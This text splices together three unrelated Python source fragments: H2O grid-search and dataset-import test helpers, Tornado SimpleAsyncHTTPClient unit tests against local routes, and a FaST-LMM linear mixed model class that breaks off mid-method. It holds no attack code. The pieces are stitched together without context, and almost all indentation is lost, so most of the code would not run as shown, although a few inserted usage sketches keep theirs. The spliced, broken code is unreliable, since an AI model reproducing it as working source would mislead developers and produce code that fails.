def for_dataset(dest_key, algo, dataset, params, grid_params, search_criteria=None):
'''
Factory for creating a GridSpec for a given Dataset (frame and additional metadata).
'''
dataset_params = {}
assert 'model_category' in dataset, "FAIL: Failed to find model_category in dataset: " + repr(dataset)
if 'response_column' in dataset: dataset_params['response_column'] = dataset['response_column']
if 'ignored_columns' in dataset: dataset_params['ignored_columns'] = dataset['ignored_columns']
return GridSpec(dest_key, algo, dataset['dest_key'], dict(dataset_params.items() + params.items()), grid_params, dataset['model_category'], search_criteria)
def build_and_validate_grid(self, a_node):
before = time.time()
if isVerbose(): print('About to build: ' + self['dest_key'] + ', a ' + self['algo'] + ' model grid on frame: ' + self['frame_key'] + ' with params: ' + repr(self['params']) + ' and grid_params: ' + repr(self['grid_params']))
# returns a GridSearchSchema:
result = a_node.build_model_grid(algo=self['algo'], grid_id=self['dest_key'], training_frame=self['frame_key'], parameters=self['params'], grid_parameters=self['grid_params'], search_criteria=self['search_criteria'], timeoutSecs=240) # synchronous
if isVerboser(): print('result: ' + repr(result))
grid = a_node.grid(key=self['dest_key'])
if isVerboser(): print('grid: ' + repr(grid))
validate_grid_builder_result(grid, self['params'], self['grid_params'], self['dest_key'])
# print("grid result: " + repr(grid))
# print("grid __meta: " + repr(grid['__meta']))
for model_key_dict in grid['model_ids']:
model_key = model_key_dict['name']
model = validate_model_exists(a_node, model_key)
validate_actual_parameters(self['params'], model['parameters'], self['frame_key'], None)
validate_grid_parameters(self['grid_params'], model['parameters'])
assert 'output' in model, 'FAIL: Failed to find output object in model: ' + self['dest_key']
assert 'model_category' in model['output'], 'FAIL: Failed to find model_category in model: ' + self['dest_key']
assert model['output']['model_category'] == self['model_category'], 'FAIL: Expected model_category: ' + self['model_category'] + ' but got: ' + model['output']['model_category'] + ' for model: ' + self['dest_key']
# Cartesian or random with max_models: check that we got the right number of models if we know beforehand:
combos = 1
for k, vals in self['grid_params'].iteritems():
combos *= len(vals)
# NOTE: if we have a stopping criterion which is not a fixed number of models we don't know how many models to expect
expected = None
if self['search_criteria'] is None or self['search_criteria']['strategy'] == 'Cartesian':
expected = combos
elif self['search_criteria'] is not None and 'max_models' in self['search_criteria'] and 'max_time_ms' not in self['search_criteria']:
expected = min(combos, self['search_criteria']['max_models'])
if expected is not None:
assert expected == len(grid['model_ids']), 'FAIL: Expected ' + str(expected) + ' models; got: ' + str(len(grid['model_ids']))
if isVerbose(): print('Done building: ' + self['dest_key'] + " (" + str(time.time() - before) + ")")
return grid
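# Minimal usage sketch (illustrative keys and params): with search_criteria
# left as None the grid is treated as Cartesian, so build_and_validate_grid
# expects exactly len([2, 3, 4]) == 3 models.
def _example_build_kmeans_grid(a_node):
    spec = GridSpec('kmeans_prostate_grid', 'kmeans', 'prostate.hex',
                    {}, {'k': [2, 3, 4]}, 'Clustering')
    return spec.build_and_validate_grid(a_node)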
### TODO: we should be able to have multiple DatasetSpecs that come from a single parse, for efficiency
class DatasetSpec(dict):
'''
Dictionary which specifies the properties of a Frame (Dataset) for a specific use
(e.g., prostate data with binomial classification on the CAPSULE column
OR prostate data with regression on the AGE column).
'''
def __init__(self, dest_key, path, expected_rows, model_category, response_column, ignored_columns):
self['path'] = os.path.realpath(path)
self['expected_rows'] = expected_rows
self['model_category'] = model_category
self['response_column'] = response_column
self['ignored_columns'] = ignored_columns
if dest_key is None:
# derive a default dest_key from the file name
basename = os.path.basename(path)
basename_split = basename.split(".")
if len(basename_split) == 1:
self['dest_key'] = basename_split[0] + ".hex" # name + ".hex"
else:
self['dest_key'] = basename_split[-2] + ".hex" # name without suffix + ".hex"
else:
self['dest_key'] = dest_key
def import_and_validate_dataset(self, a_node):
if isVerbose(): print("About to import and validate: " + self['path'])
import_result = a_node.import_files(path=self['path'])
if isVerboser():
print("import_result: ")
pp.pprint(import_result)
print("frames: ")
pp.pprint(a_node.frames(key=import_result['destination_frames'][0], row_count=5))
frames = a_node.frames(key=import_result['destination_frames'][0], row_count=5)['frames']
assert frames[0]['is_text'], "FAIL: Raw imported Frame is not is_text: " + repr(frames[0])
parse_result = a_node.parse(key=import_result['destination_frames'][0], dest_key=self['dest_key']) # TODO: handle multiple files
key = parse_result['frames'][0]['frame_id']['name']
assert key == self['dest_key'], 'FAIL: Imported frame key is wrong; expected: ' + self['dest_key'] + ', got: ' + key
assert self['expected_rows'] == parse_result['frames'][0]['rows'], 'FAIL: Imported frame number of rows is wrong; expected: ' + str(self['expected_rows']) + ', got: ' + str(parse_result['frames'][0]['rows'])
self['dataset'] = parse_result['frames'][0] # save the imported dataset object
if isVerbose(): print("Imported and validated key: " + self['dataset']['frame_id']['name'])
return self['dataset']
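# Minimal usage sketch (the path and expected row count are illustrative):
def _example_import_prostate(a_node):
    spec = DatasetSpec(None, 'smalldata/prostate.csv', 380,
                       'Binomial', 'CAPSULE', ['ID'])
    return spec.import_and_validate_dataset(a_node)  # parses to 'prostate.hex'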
# ---------------------------------------------------------------------------
import collections
import gzip
import logging
import socket
from tornado.ioloop import IOLoop
from tornado.simple_httpclient import SimpleAsyncHTTPClient, _DEFAULT_CA_CERTS
from tornado.test.httpclient_test import HTTPClientCommonTestCase, ChunkHandler, CountdownHandler, HelloWorldHandler
from tornado.testing import AsyncHTTPTestCase, LogTrapTestCase
from tornado.util import b
from tornado.web import RequestHandler, Application, asynchronous, url
class SimpleHTTPClientCommonTestCase(HTTPClientCommonTestCase):
def get_http_client(self):
client = SimpleAsyncHTTPClient(io_loop=self.io_loop,
force_instance=True)
self.assertTrue(isinstance(client, SimpleAsyncHTTPClient))
return client
# Remove the base class from our namespace so the unittest module doesn't
# try to run it again.
del HTTPClientCommonTestCase
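# TriggerHandler parks each /trigger request: it appends its own finish
# callback to a shared deque and wakes the waiting test via wake_callback.
# The test later pops and invokes those callbacks to complete the pending
# requests in a controlled order (see test_connection_limit below).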
class TriggerHandler(RequestHandler):
def initialize(self, queue, wake_callback):
self.queue = queue
self.wake_callback = wake_callback
@asynchronous
def get(self):
logging.info("queuing trigger")
self.queue.append(self.finish)
self.wake_callback()
class HangHandler(RequestHandler):
@asynchronous
def get(self):
pass
class ContentLengthHandler(RequestHandler):
def get(self):
self.set_header("Content-Length", self.get_argument("value"))
self.write("ok")
class HeadHandler(RequestHandler):
def head(self):
self.set_header("Content-Length", "7")
class NoContentHandler(RequestHandler):
def get(self):
if self.get_argument("error", None):
self.set_header("Content-Length", "7")
self.set_status(204)
class SeeOther303PostHandler(RequestHandler):
def post(self):
assert self.request.body == b("blah")
self.set_header("Location", "/303_get")
self.set_status(303)
class SeeOther303GetHandler(RequestHandler):
def get(self):
assert not self.request.body
self.write("ok")
class SimpleHTTPClientTestCase(AsyncHTTPTestCase, LogTrapTestCase):
def setUp(self):
super(SimpleHTTPClientTestCase, self).setUp()
self.http_client = SimpleAsyncHTTPClient(self.io_loop)
def get_app(self):
# callable objects to finish pending /trigger requests
self.triggers = collections.deque()
return Application([
url("/trigger", TriggerHandler, dict(queue=self.triggers,
wake_callback=self.stop)),
url("/chunk", ChunkHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/hang", HangHandler),
url("/hello", HelloWorldHandler),
url("/content_length", ContentLengthHandler),
url("/head", HeadHandler),
url("/no_content", NoContentHandler),
url("/303_post", SeeOther303PostHandler),
url("/303_get", SeeOther303GetHandler),
], gzip=True)
def test_singleton(self):
# Class "constructor" reuses objects on the same IOLoop
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is
SimpleAsyncHTTPClient(self.io_loop))
# unless force_instance is used
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is not
SimpleAsyncHTTPClient(self.io_loop,
force_instance=True))
# different IOLoops use different objects
io_loop2 = IOLoop()
self.assertTrue(SimpleAsyncHTTPClient(self.io_loop) is not
SimpleAsyncHTTPClient(io_loop2))
def test_connection_limit(self):
client = SimpleAsyncHTTPClient(self.io_loop, max_clients=2,
force_instance=True)
self.assertEqual(client.max_clients, 2)
seen = []
# Send 4 requests. Two can be sent immediately, while the others
# will be queued
for i in range(4):
client.fetch(self.get_url("/trigger"),
lambda response, i=i: (seen.append(i), self.stop()))
self.wait(condition=lambda: len(self.triggers) == 2)
self.assertEqual(len(client.queue), 2)
# Finish the first two requests and let the next two through
self.triggers.popleft()()
self.triggers.popleft()()
self.wait(condition=lambda: (len(self.triggers) == 2 and
len(seen) == 2))
self.assertEqual(set(seen), set([0, 1]))
self.assertEqual(len(client.queue), 0)
# Finish all the pending requests
self.triggers.popleft()()
self.triggers.popleft()()
self.wait(condition=lambda: len(seen) == 4)
self.assertEqual(set(seen), set([0, 1, 2, 3]))
self.assertEqual(len(self.triggers), 0)
def test_redirect_connection_limit(self):
# following redirects should not consume additional connections
client = SimpleAsyncHTTPClient(self.io_loop, max_clients=1,
force_instance=True)
client.fetch(self.get_url('/countdown/3'), self.stop,
max_redirects=3)
response = self.wait()
response.rethrow()
def test_default_certificates_exist(self):
open(_DEFAULT_CA_CERTS).close()
def test_gzip(self):
# All the tests in this file should be using gzip, but this test
# ensures that it is in fact getting compressed.
# Setting Accept-Encoding manually bypasses the client's
# decompression so we can see the raw data.
response = self.fetch("/chunk", use_gzip=False,
headers={"Accept-Encoding": "gzip"})
self.assertEqual(response.headers["Content-Encoding"], "gzip")
self.assertNotEqual(response.body, b("asdfqwer"))
# Our test data gets bigger when gzipped. Oops. :)
self.assertEqual(len(response.body), 34)
f = gzip.GzipFile(mode="r", fileobj=response.buffer)
self.assertEqual(f.read(), b("asdfqwer"))
def test_max_redirects(self):
response = self.fetch("/countdown/5", max_redirects=3)
self.assertEqual(302, response.code)
# We requested 5, followed three redirects for 4, 3, 2, then the last
# unfollowed redirect is to 1.
self.assertTrue(response.request.url.endswith("/countdown/5"))
self.assertTrue(response.effective_url.endswith("/countdown/2"))
self.assertTrue(response.headers["Location"].endswith("/countdown/1"))
def test_303_redirect(self):
response = self.fetch("/303_post", method="POST", body="blah")
self.assertEqual(200, response.code)
self.assertTrue(response.request.url.endswith("/303_post"))
self.assertTrue(response.effective_url.endswith("/303_get"))
#request is the original request, is a POST still
self.assertEqual("POST", response.request.method)
def test_request_timeout(self):
response = self.fetch('/hang', request_timeout=0.1)
self.assertEqual(response.code, 599)
self.assertTrue(0.099 < response.request_time < 0.11, response.request_time)
self.assertEqual(str(response.error), "HTTP 599: Timeout")
def test_ipv6(self):
if not socket.has_ipv6:
# python compiled without ipv6 support, so skip this test
return
try:
self.http_server.listen(self.get_http_port(), address='::1')
except socket.gaierror as e:
if e.args[0] == socket.EAI_ADDRFAMILY:
# python supports ipv6, but it's not configured on the network
# interface, so skip this test.
return
raise
url = self.get_url("/hello").replace("localhost", "[::1]")
# ipv6 is currently disabled by default and must be explicitly requested
self.http_client.fetch(url, self.stop)
response = self.wait()
self.assertEqual(response.code, 599)
self.http_client.fetch(url, self.stop, allow_ipv6=True)
response = self.wait()
self.assertEqual(response.body, b("Hello world!"))
def test_multiple_content_length_accepted(self):
response = self.fetch("/content_length?value=2,2")
self.assertEqual(response.body, b("ok"))
response = self.fetch("/content_length?value=2,%202,2")
self.assertEqual(response.body, b("ok"))
response = self.fetch("/content_length?value=2,4")
self.assertEqual(response.code, 599)
response = self.fetch("/content_length?value=2,%202,3")
self.assertEqual(response.code, 599)
def test_head_request(self):
response = self.fetch("/head", method="HEAD")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["content-length"], "7")
self.assertFalse(response.body)
def test_no_content(self):
response = self.fetch("/no_content")
self.assertEqual(response.code, 204)
# 204 status doesn't need a content-length, but tornado will
# add a zero content-length anyway.
self.assertEqual(response.headers["Content-length"], "0")
# 204 status with non-zero content length is malformed
response = self.fetch("/no_content?error=1")
self.assertEqual(response.code, 599)
# ---------------------------------------------------------------------------
import scipy as SP
import numpy as NP
import numpy as np  # several methods below use the lowercase alias
import scipy.linalg as LA
import scipy.optimize as opt
import scipy.stats as ST
import scipy.special as SS
from fastlmm.util.mingrid import *
from fastlmm.util.util import *
import time
import warnings
import logging
class LMM(object):
"""
linear mixed model with up to two kernels
N(y | X*beta ; sigma2*(h2*((1-a2)*K0 + a2*K1) + (1-h2)*I)),
where
K0 = G0*G0^T
K1 = G1*G1^T
"""
__slots__ = ["G","G0","G1","y","X","K0","K1","K","U","S","UX","Uy","UUX","UW","UUW","UUy","pos0","pos1","a2","exclude_idx",
"forcefullrank","numcalls","Xstar","Kstar","Kstar_star","UKstar","UUKstar","Gstar","K0star","K1star","K0star_star","K1star_star"]
def __init__(self,forcefullrank=False):
'''
Input:
forcefullrank : if True, then the code always computes K and runs cubically
(False)
'''
self.X=None
self.y=None
self.G=None
self.G0=None
self.G1=None
self.K=None
self.K0=None
self.K1=None
self.U=None
self.S=None
self.Uy=None
self.UUy=None
self.UX=None
self.UUX=None
self.UW=None
self.UUW=None
self.pos0=None
self.pos1=None
self.a2=None
self.exclude_idx=[]
self.forcefullrank=forcefullrank
self.numcalls=0
self.Xstar=None
self.Kstar=None
self.Kstar_star = None
self.UKstar=None
self.UUKstar=None
self.Gstar = None
def setX(self, X):
'''
set the fixed effects X (covariates).
The Kernel has to be set in advance by first calling setG() or setK().
--------------------------------------------------------------------------
Input:
X : [N*D] 2-dimensional array of covariates
--------------------------------------------------------------------------
'''
self.X = X
self.UX = self.U.T.dot(X)
k=self.S.shape[0]
N=self.X.shape[0]
if (k<N):
self.UUX = X - self.U.dot(self.UX)
def setX2(self, X):
'''
a version of setX that doesn't assume that Eigenvalue decomposition has been done.
'''
self.X = X
N=self.X.shape[0]
def sety(self, y):
'''
set the phenotype y.
The Kernel has to be set in advance by first calling setG() or setK().
--------------------------------------------------------------------------
Input:
y : [N] 1-dimensional array of phenotype values
--------------------------------------------------------------------------
'''
assert y.ndim==1, "y should be 1-dimensional"
self.y = y
self.Uy = self.U.T.dot(y)
k=self.S.shape[0]
N=self.y.shape[0]
if (k<N):
self.UUy = y - self.U.dot(self.Uy)
def sety2(self, y):
'''
a version of sety that doesn't assume that Eigenvalue decomposition has been done.
'''
assert y.ndim==1, "y should be 1-dimensional"
self.y = y
N=self.y.shape[0]
def setG(self, G0=None, G1=None, a2=0.0, K0=None,K1=None):
'''
set the Kernel (1-a2)*K0 and a2*K1 from G0 and G1.
This has to be done before setting the data setX() and setY().
If k0+k1>>N and similar kernels are used repeatedly, it is beneficial to precompute
the kernel and pass it as an argument.
----------------------------------------------------------------------------
Input:
G0 : [N*k0] array of random effects
G1 : [N*k1] array of random effects (optional)
a2 : mixture weight between K0=G0*G0^T and K1=G1*G1^T
K0 : [N*N] array, random effects covariance (positive semi-definite)
K1 : [N*N] array, random effects covariance (positive semi-definite)(optional)
-----------------------------------------------------------------------------
'''
self.G0 = G0
self.G1 = G1
if a2 <0.0:
a2=0.0
if a2>1.0:
a2=1.0
if G1 is None and G0 is not None:
self.G=G0
elif G0 is not None and G1 is not None:
#build the weighted concatenation of G0 and G1 = varianceComponent
if a2 == 0.0:
logging.info("a2=0.0, only using G0")
self.G = G0
elif a2 == 1.0:
self.G = G1
logging.info("a2=1.0, only using G1")
else:
self.G = SP.concatenate((SP.sqrt(1.0-a2) * G0, SP.sqrt(a2) * G1),1)
else:
self.G=None
if self.G is not None:
N = self.G.shape[0]
k = self.G.shape[1]
else:
N = K0.shape[0]
k=N
if k>0:
if ((not self.forcefullrank) and (k<N)):
# the SVD of G is more accurate; the eigendecomposition of G.T*G (the fallback below) would be faster
try:
[U,S,V] = LA.svd(self.G,full_matrices = False)
if np.any(S < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
self.U = U
self.S = S*S
except LA.LinAlgError: # revert to Eigenvalue decomposition
logging.warning("Got SVD exception, trying eigenvalue decomposition of square of G. Note that this is a little bit less accurate")
[S_,V_] = LA.eigh(self.G.T.dot(self.G))
if np.any(S_ < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
S_nonz=(S_>0)
self.S = S_[S_nonz]
self.S*=(N/self.S.sum())
self.U=self.G.dot(V_[:,S_nonz]/SP.sqrt(self.S))
else:
if K0 is None:
K0=self.G0.dot(self.G0.T)
self.K0=K0
if (self.G1 is not None) and (K1 is None):
K1=self.G1.dot(self.G1.T)
self.setK(K0=K0, K1=K1, a2=a2)
#K=self.G.dot(self.G.T)
#self.setK(K)
self.a2 = a2
pass
else:#rank of kernel = 0 (linear regression case)
self.S = SP.zeros((0))
self.U = SP.zeros_like(self.G)
def setK(self, K0, K1=None, a2=0.0):
'''
set the Kernel (1-a2)*K0 and a2*K1.
This has to be done before setting the data setX() and setY().
--------------------------------------------------------------------------
Input:
K0 : [N*N] array, random effects covariance (positive semi-definite)
K1 : [N*N] array, random effects covariance (positive semi-definite)(optional)
a2 : mixture weight between K0 and K1
--------------------------------------------------------------------------
'''
self.K0 = K0
self.K1 = K1
logging.debug("About to mix K0 and K1")
if K1 is None:
self.K = K0
else:
self.K = (1.0-a2) * K0 + a2 * K1
logging.debug("About to eigh")
[S,U] = LA.eigh(self.K)
logging.debug("Done with to eigh")
if np.any(S < -0.1):
logging.warning("kernel contains a negative Eigenvalue")
self.U=U
self.S=S#*(S.shape[0]/S.sum())
self.a2 = a2
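# Invariant established here (illustrative sketch, not in the original
# module): after setK, self.U and self.S satisfy
#     self.K ~= self.U.dot(NP.diag(self.S)).dot(self.U.T)
# e.g. for K0 = A.dot(A.T) with A = NP.random.randn(10, 3):
#     lmm = LMM(); lmm.setK(K0)
#     NP.allclose(lmm.U.dot(NP.diag(lmm.S)).dot(lmm.U.T), lmm.K)  # -> True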
def setK2(self, K0, K1=None, a2=0.0):
'''
a version of setK that doesn't do Eigenvalue decomposition.
'''
self.K0 = K0
self.K1 = K1
logging.debug("About to mix K0 and K1")
if K1 is None:
self.K = K0
else:
self.K = (1.0-a2) * K0 + a2 * K1
self.a2 = a2
def set_exclude_idx(self, idx):
'''
--------------------------------------------------------------------------
Input:
idx : [k_up: number of SNPs to be removed] holds the indices of SNPs to be removed
--------------------------------------------------------------------------
'''
self.exclude_idx = idx
def innerLoopTwoKernel(self, a2 = 0.5, nGridH2=10, minH2=0.0, maxH2=0.99999, **kwargs):
'''
For a given weight a2, finds the optimal h2 and returns the negative log-likelihood
--------------------------------------------------------------------------
Input:
a2 : mixture weight between K0 and K1
nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2
--------------------------------------------------------------------------
'''
if self.K0 is not None:
self.setK(K0 = self.K0, K1 = self.K1, a2 = a2)
else:
self.setG(G0 = self.G0, G1 = self.G1, a2 = a2)
self.setX(self.X)
self.sety(self.y)
return self.findH2(nGridH2=nGridH2, minH2=minH2, maxH2=maxH2, **kwargs)
def findA2(self, nGridA2=10, minA2=0.0, maxA2=1.0, nGridH2=10, minH2=0.0, maxH2=0.99999,verbose=False, **kwargs):
'''
Find the optimal a2 and h2, such that K=(1.0-a2)*K0+a2*K1. Performs a double loop optimization (could be expensive for large grid-sizes)
(default maxA2 value is set to 1 as loss of positive definiteness of the final model covariance only depends on h2, not a2)
--------------------------------------------------------------------------
Input:
nGridA2 : number of a2-grid points to evaluate the negative log-likelihood at
minA2 : minimum value for a2 optimization
maxA2 : maximum value for a2 optimization
nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2 and a2
--------------------------------------------------------------------------
'''
self.numcalls=0
resmin=[None]
def f(x,resmin=resmin, nGridH2=nGridH2, minH2=minH2, maxH2=maxH2,**kwargs):
self.numcalls+=1
t0=time.time()
res = self.innerLoopTwoKernel(a2=x, nGridH2=nGridH2, minH2=minH2, maxH2=maxH2,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
t1=time.time()
logging.info("x={0}. one objective function call took {1} seconds elapsed ".format(x,t1-t0))
#import pdb; pdb.set_trace()
return res['nLL']
if verbose: logging.info("finda2")
minimize1D(f=f, nGrid=nGridA2, minval=minA2, maxval=maxA2, verbose=False)
#print "numcalls to innerLoopTwoKernel= " + str(self.numcalls)
return resmin[0]
def findH2(self, nGridH2=10, minH2 = 0.0, maxH2 = 0.99999, **kwargs):
'''
Find the optimal h2 for a given K. Note that this is the single kernel case. So there is no a2.
(default maxH2 value is set to a value smaller than 1 to avoid loss of positive definiteness of the final model covariance)
--------------------------------------------------------------------------
Input:
nGridH2 : number of h2-grid points to evaluate the negative log-likelihood at
minH2 : minimum value for h2 optimization
maxH2 : maximum value for h2 optimization
--------------------------------------------------------------------------
Output:
dictionary containing the model parameters at the optimal h2
--------------------------------------------------------------------------
'''
#f = lambda x : (self.nLLeval(h2=x,**kwargs)['nLL'])
resmin=[None]
def f(x,resmin=resmin,**kwargs):
res = self.nLLeval(h2=x,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
logging.debug("search\t{0}\t{1}".format(x,res['nLL']))
return res['nLL']
minimize1D(f=f, nGrid=nGridH2, minval=minH2, maxval=maxH2)
return resmin[0]
def find_log_delta(self, sid_count, min_log_delta=-5, max_log_delta=10, nGrid=10, **kwargs):
'''
Find the optimal log(delta) by a 1-D grid search. Internally the search runs
in h2 space (see the relation sketched below) and converts back to log(delta).
'''
#f = lambda x : (self.nLLeval(h2=x,**kwargs)['nLL'])
resmin=[None]
def f(x,resmin=resmin,**kwargs):
h2 = 1.0/(np.exp(x)*sid_count+1) #We convert from external log_delta to h2 and then back again so that this code is most similar to findH2
res = self.nLLeval(h2=h2,**kwargs)
if (resmin[0] is None) or (res['nLL']<resmin[0]['nLL']):
resmin[0]=res
#logging.info("search\t{0}\t{1}".format(x,res['nLL']))
return res['nLL']
minimize1D(f=f, nGrid=nGrid, minval=min_log_delta, maxval=max_log_delta)
res = resmin[0]
internal_delta = 1.0/res['h2']-1.0
ln_external_delta = np.log(internal_delta / sid_count)
res['log_delta'] = ln_external_delta
return res
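# Relation used by find_log_delta above (sketch): with external delta d and
# sid_count m,
#     h2 = 1 / (d*m + 1)    <=>    d = (1/h2 - 1) / m,
# so a grid over x = log(d) is equivalent to a warped grid over h2, and the
# optimum found in one parameterization maps directly to the other.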
def nLLeval(self,h2=0.0,REML=True, logdelta = None, delta = None, dof = None, scale = 1.0,penalty=0.0):
'''
evaluate -ln( N( U^T*y | U^T*X*beta , h2*S + (1-h2)*I ) ),
where ((1-a2)*K0 + a2*K1) = USU^T
--------------------------------------------------------------------------
Input:
h2 : mixture weight between K and Identity (environmental noise)
REML : boolean
if True : compute REML
if False : compute ML
dof : Degrees of freedom of the Multivariate student-t
(default None uses multivariate Normal likelihood)
logdelta: log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter that multiplies the Covariance matrix (default 1.0)
--------------------------------------------------------------------------
Output dictionary:
'nLL' : negative log-likelihood
'sigma2' : the model variance sigma^2
'beta' : [D*1] array of fixed effects weights beta
'h2' : mixture weight between Covariance and noise
'REML' : True: REML was computed, False: ML was computed
'a2' : mixture weight between K0 and K1
'dof' : Degrees of freedom of the Multivariate student-t
(default None uses multivariate Normal likelihood)
'scale' : Scale parameter that multiplies the Covariance matrix (default 1.0)
--------------------------------------------------------------------------
'''
if (h2<0.0) or (h2>1.0):
return {'nLL':3E20,
'h2':h2,
'REML':REML,
'scale':scale}
k=self.S.shape[0]
N=self.y.shape[0]
D=self.UX.shape[1]
#if REML == True:
# # this needs to be fixed, please see test_gwas.py for details
# raise NotImplementedError("this feature is not ready to use at this time, please use lmm_cov.py instead")
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
Sd = (self.S+delta)*scale
else:
Sd = (h2*self.S + (1.0-h2))*scale
UXS = self.UX / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,self.UX.shape[1]), (Sd.itemsize,0))
UyS = self.Uy / Sd
XKX = UXS.T.dot(self.UX)
XKy = UXS.T.dot(self.Uy)
yKy = UyS.T.dot(self.Uy)
logdetK = SP.log(Sd).sum()
if (k<N):#low rank part
# determine normalization factor
if delta is not None:
denom = (delta*scale)
else:
denom = ((1.0-h2)*scale)
XKX += self.UUX.T.dot(self.UUX)/(denom)
XKy += self.UUX.T.dot(self.UUy)/(denom)
yKy += self.UUy.T.dot(self.UUy)/(denom)
logdetK+=(N-k) * SP.log(denom)
# proximal contamination (see Supplement Note 2: An Efficient Algorithm for Avoiding Proximal Contamination)
# available at: http://www.nature.com/nmeth/journal/v9/n6/extref/nmeth.2037-S1.pdf
# exclude SNPs from the RRM in the likelihood evaluation
if len(self.exclude_idx) > 0:
num_exclude = len(self.exclude_idx)
# consider only excluded SNPs
G_exclude = self.G[:,self.exclude_idx]
self.UW = self.U.T.dot(G_exclude) # needed for proximal contamination
UWS = self.UW / NP.lib.stride_tricks.as_strided(Sd, (Sd.size,num_exclude), (Sd.itemsize,0))
assert UWS.shape == (k, num_exclude)
WW = NP.eye(num_exclude) - UWS.T.dot(self.UW)
WX = UWS.T.dot(self.UX)
Wy = UWS.T.dot(self.Uy)
assert WW.shape == (num_exclude, num_exclude)
assert WX.shape == (num_exclude, D)
assert Wy.shape == (num_exclude,)
if (k<N):#low rank part
self.UUW = G_exclude - self.U.dot(self.UW)
WW += self.UUW.T.dot(self.UUW)/denom
WX += self.UUW.T.dot(self.UUX)/denom
Wy += self.UUW.T.dot(self.UUy)/denom
#TODO: do cholesky, if fails do eigh
# compute inverse efficiently
[S_WW,U_WW] = LA.eigh(WW)
UWX = U_WW.T.dot(WX)
UWy = U_WW.T.dot(Wy)
assert UWX.shape == (num_exclude, D)
assert UWy.shape == (num_exclude,)
# compute S_WW^{-1} * UWX
WX = UWX / NP.lib.stride_tricks.as_strided(S_WW, (S_WW.size,UWX.shape[1]), (S_WW.itemsize,0))
# compute S_WW^{-1} * UWy
Wy = UWy / S_WW
# determinant update
logdetK += SP.log(S_WW).sum()
assert WX.shape == (num_exclude, D)
assert Wy.shape == (num_exclude,)
# perform updates (instantiations for a and b in Equation (1.5) of Supplement)
yKy += UWy.T.dot(Wy)
XKy += UWX.T.dot(Wy)
XKX += UWX.T.dot(WX)
#######
[SxKx,UxKx]= LA.eigh(XKX)
#optionally regularize the beta weights by penalty
if penalty>0.0:
SxKx+=penalty
i_pos = SxKx>1E-10
beta = SP.dot(UxKx[:,i_pos],(SP.dot(UxKx[:,i_pos].T,XKy)/SxKx[i_pos]))
r2 = yKy-XKy.dot(beta)
if dof is None:#Use the Multivariate Gaussian
if REML:
XX = self.X.T.dot(self.X)
[Sxx,Uxx]= LA.eigh(XX)
logdetXX = SP.log(Sxx).sum()
logdetXKX = SP.log(SxKx).sum()
sigma2 = r2 / (N - D)
nLL = 0.5 * ( logdetK + logdetXKX - logdetXX + (N-D) * ( SP.log(2.0*SP.pi*sigma2) + 1 ) )
else:
sigma2 = r2 / (N)
nLL = 0.5 * ( logdetK + N * ( SP.log(2.0*SP.pi*sigma2) + 1 ) )
result = {
'nLL':nLL,
'sigma2':sigma2,
'beta':beta,
'h2':h2,
'REML':REML,
'a2':self.a2,
'scale':scale
}
else:#Use multivariate student-t
if REML:
XX = self.X.T.dot(self.X)
[Sxx,Uxx]= LA.eigh(XX)
logdetXX = SP.log(Sxx).sum()
logdetXKX = SP.log(SxKx).sum()
nLL = 0.5 * ( logdetK + logdetXKX - logdetXX + (dof + (N-D)) * SP.log(1.0+r2/dof) )
nLL += 0.5 * (N-D)*SP.log( dof*SP.pi ) + SS.gammaln( 0.5*dof ) - SS.gammaln( 0.5* (dof + (N-D) ))
else:
nLL = 0.5 * ( logdetK + (dof + N) * SP.log(1.0+r2/dof) )
nLL += 0.5 * N*SP.log( dof*SP.pi ) + SS.gammaln( 0.5*dof ) - SS.gammaln( 0.5* (dof + N ))
result = {
'nLL':nLL,
'dof':dof,
'beta':beta,
'h2':h2,
'REML':REML,
'a2':self.a2,
'scale':scale
}
assert SP.all(SP.isreal(nLL)), "nLL has an imaginary component, possibly due to constant covariates"
return result
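# Worked example (sketch with synthetic data; not part of the original
# module):
#     NP.random.seed(0); N, k = 20, 5
#     G = NP.random.randn(N, k) / NP.sqrt(k)
#     X = NP.hstack([NP.ones((N, 1)), NP.random.randn(N, 1)])
#     lmm = LMM(); lmm.setG(G0=G); lmm.setX(X); lmm.sety(NP.random.randn(N))
#     res = lmm.nLLeval(h2=0.5, REML=False)
# res['nLL'] matches the direct multivariate-normal negative log-likelihood
# -log N(y | X*res['beta'], res['sigma2']*(0.5*G.dot(G.T) + 0.5*NP.eye(N)))
# but is computed in the rotated eigenbasis, avoiding an O(N^3) solve.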
def getPosteriorWeights(self,beta,h2=0.0,logdelta=None,delta=None,scale=1.0):
'''
compute posterior mean over the feature weights (effect sizes of SNPs in the kernel, not the SNPs being tested):
w = G.T (GG.T + delta*I)^(-1) (y - Xbeta)
--------------------------------------------------------------------------
Input:
beta : weight vector for fixed effects
h2 : mixture weight between K and Identity (environmental noise)
logdelta : log(delta) allows to optionally parameterize in delta space
delta : delta allows to optionally parameterize in delta space
scale : Scale parameter that multiplies the Covariance matrix (default 1.0)
returnVar : if True, marginal variances are estimated
returnCovar : if True, posterior covariance is learnt
--------------------------------------------------------------------------
Dictionary with the following fields:
weights : [k0+k1] 1-dimensional array of predicted phenotype values
--------------------------------------------------------------------------
'''
k=self.S.shape[0]
N=self.y.shape[0]
if logdelta is not None:
delta = SP.exp(logdelta)
if delta is not None:
Sd = (self.S+delta)*scale
else:
Sd = (h2*self.S + (1.0-h2))*scale
yres = self.y - SP.dot(self.X,beta)
Uyres = SP.dot(self.U.T,yres)
UG = SP.dot(self.U.T, self.G)
weights = SP.dot(UG.T , Uyres/Sd)
